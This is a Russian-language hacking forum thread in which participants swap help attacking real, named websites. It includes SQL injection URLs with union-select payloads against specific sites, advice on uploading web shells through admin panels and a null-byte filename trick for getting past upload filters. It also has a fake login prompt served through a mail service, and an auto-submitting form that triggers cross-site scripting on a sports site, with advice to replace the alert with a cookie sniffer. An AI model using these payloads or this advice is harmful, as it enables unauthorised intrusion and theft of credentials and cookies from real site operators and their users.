Расскажите ка мне в чём проблема =) http://www.cs.virginia.edu/csnews/show.php?artID=-9+union+select+2,3,convert(3+using+latin1),5,6,7,8,9,20 http://www.cs.virginia.edu/csnews/show.php?artID=-9+union+select+2,3,convert(3+using+latin1),5,6,7,8,9,20+from+information_schema.tables
Ситуация: нашел sql инъекцию, узнал пасс админа, зашел под админом. Могу присвоить картинки некоторым предметам, изменять некоторые предметы. И все. Как можно залить шелл??? Пробовал присвоить картинку шелл.рнр , но там есть фильтр. Помогите залить шелл.
а что за админка то? насколько я понял возможен аплоад файлов попробуй впиши веб шелл в файлы с именами bla.php%00.jpg или bla.php.rar...
Админка от онлайн игры. Что-то я не понял. Если я поменяю shell.php в bla.php%00.jpg тогда я не смогу запустить шелл. Он будет открываться как картинка.
помогите подобрать таблу с юзерами http://wapclick.info/forum/readmess.php?UIN=Guest&pass=Guest&next_row=1&topic=-1+union+select+0,0,1,0,2,0/*&room=1&user=1
Что-то я не понял. Если я поменяю shell.php в bla.php%00.jpg тогда я не смогу запустить шелл. Он будет открываться как картинка. Пр удачной для тебя настройке сервера, т е magic_quotes_gpc=off и наличии кривого скрипта, файл загурзится с именем bla.php%00.jpg, после вызова функции copy() нулевой байт откинет разшерение .jpg и у тебя будет файл bla.php
Code: http://www.verra-motors.ru/main/index.html?id=5'INSERT%20INTO%20Users%20VALUES('admin',%20'123') Я конечно извиняюсь, может я нареоман в синтаксисе Mysql, но почему ошибки вылазят?
нельзя в mysql inj вставлять записи Разве что уязвимый запрос будет: PHP: INSERT INTO [SQL-INJ] bla lba... /*
Klaus Doring у тебя идет выборка из таблицы т.е. можно только выбирать данные из таб и притом еще с объед запросом union ENFIX тебе показал как можно вставить данные, посмотри может на сайте есть рега и может там есть скуль.
Спасибо за ответ, реги нет, как в данном случае лучше провести инъекцию? Юзал поиск, но пожохдящей статьи не нашел, нет ни одной универсальной. Просто вот решил освоить, это мой первая найденная руками скуля
Закидываю шелл на сайт и мне выдает: Warning: copy(бла_бла_бла/шелл.php) [function.copy]: failed to open stream: Permission denied in бла_бла_бла/function.inc on line 19 Смотрел и не увидел ошыбки. В чем трабл??? И еще вопрос: что можно сделать если есть мускул инъекция??? Я узнал USER(), VERSION(), DATABASE() Можно ли узнать логин и пароль к ФТП???
скорее всего у тебя нулевые права, т.е. ты не сможешь залить пока папка бла_бла не будет тебе доступна. общий синтаксис команды copy PHP: copy (string source, string dest) источник/приемник. по пробуй прописать полный путь до папки с корня. Про то что можно сделать имея скуль читай здесь http://forum.antichat.ru/thread43966.html
Всем привет! Вообщем такая штука: на один мыльный сервис я отправил письмо с "картинкой".gif ,серверу сказал чтобы .gif обрабатывал как php-скрипт. Решил проверить, что получилось Открываю новое письмо, смотрю - скрипт заработал, НО скрипт работает, если там есть такая строчка: (я взял один готовый, который использовали для форумов) PHP: Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm="coastal.ru - login"'); Точнее сказать вышеприведенный код выполняется, появляется соответствующее окно, но я хочу чтобы выполнялись другие действия, которые почему-то не хотят работать. То есть та фишка работает, а другой мой скрипт нет...почему может такое быть, как избавиться от такой проблемы?? С меня куча ++ P.S. вот тема (дубль получился ) - http://forum.antichat.ru/thread55926.html
http://allhockey.ru/ на этом сайте в поле поиск есть xss.... фильтра там помойму вообще нет...кто чем помочь может развить идею?)
http://www.championat.ru/ http://www.championat.ru/includes/index.tpl есть запросы в бд....но опять же, как использовать?)
Дай кому-нить ссылку на хтмл следующего содержания: Code: <html> <head> <title></title> </head> <body onload="document.replier.submit();"> <form action="http://allhockey.ru/find/do-search.query-post.page-0.html" name="replier" id="find" method="post"> <input type="text" name="query" value='"><script>alert(1)</script>' /> </form> </body> </html> Он увидит алерт. За место алерта ввсунь ссылку на снифер. Зы Если на этом сайте куки вообще используются
Такой вопрос. Получаю доступ к админке на форуме ipb, но залить шелл могу через раз. Отчего это зависит? От настроек сервера или форума? Пытался изменить настройки на форуме, не получилось.
